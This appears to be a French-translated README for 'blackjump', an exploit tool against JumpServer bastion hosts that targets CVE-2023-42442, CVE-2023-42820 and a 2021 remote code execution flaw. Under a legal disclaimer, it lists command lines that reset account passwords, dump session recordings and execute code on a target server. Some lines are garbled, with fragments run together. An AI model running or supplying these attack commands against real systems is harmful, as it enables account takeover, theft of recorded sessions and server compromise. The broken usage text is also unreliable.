
Exploitation non autorisée des vulnérabilités combinées de JumpServer bastion, Exploit for CVE-2023-42442 / CVE-2023-42820 / RCE 2021
Avis de non-responsabilité : Cet outil est destiné uniquement aux activités de construction de sécurité d'entreprise autorisées légalement. Lors de l'utilisation de cet outil pour des tests, vous devez vous assurer que cette action est conforme aux lois et réglementations locales et que vous avez obtenu les autorisations suffisantes. N'utilisez pas cet outil sur des cibles non autorisées.
Si vous commettez des actes illégaux lors de l'utilisation de cet outil, vous assumerez vous-même les conséquences correspondantes, et nous déclinons toute responsabilité légale ou conjointe.
Exploitation complète des vulnérabilités de JumpServer
python3 -m pip install -r requirements.txt
--user et --emailpython3 blackjump.py reset https://vulerability

<uuid4>.tar dans le répertoire output/ peut être lu avec le lecteur jumpserverpython3 blackjump.py dump https://vulerability
e
python3 blackjump.py rce http(s)://vulerability

python3 blackjump.py {reset,dump,rce} -h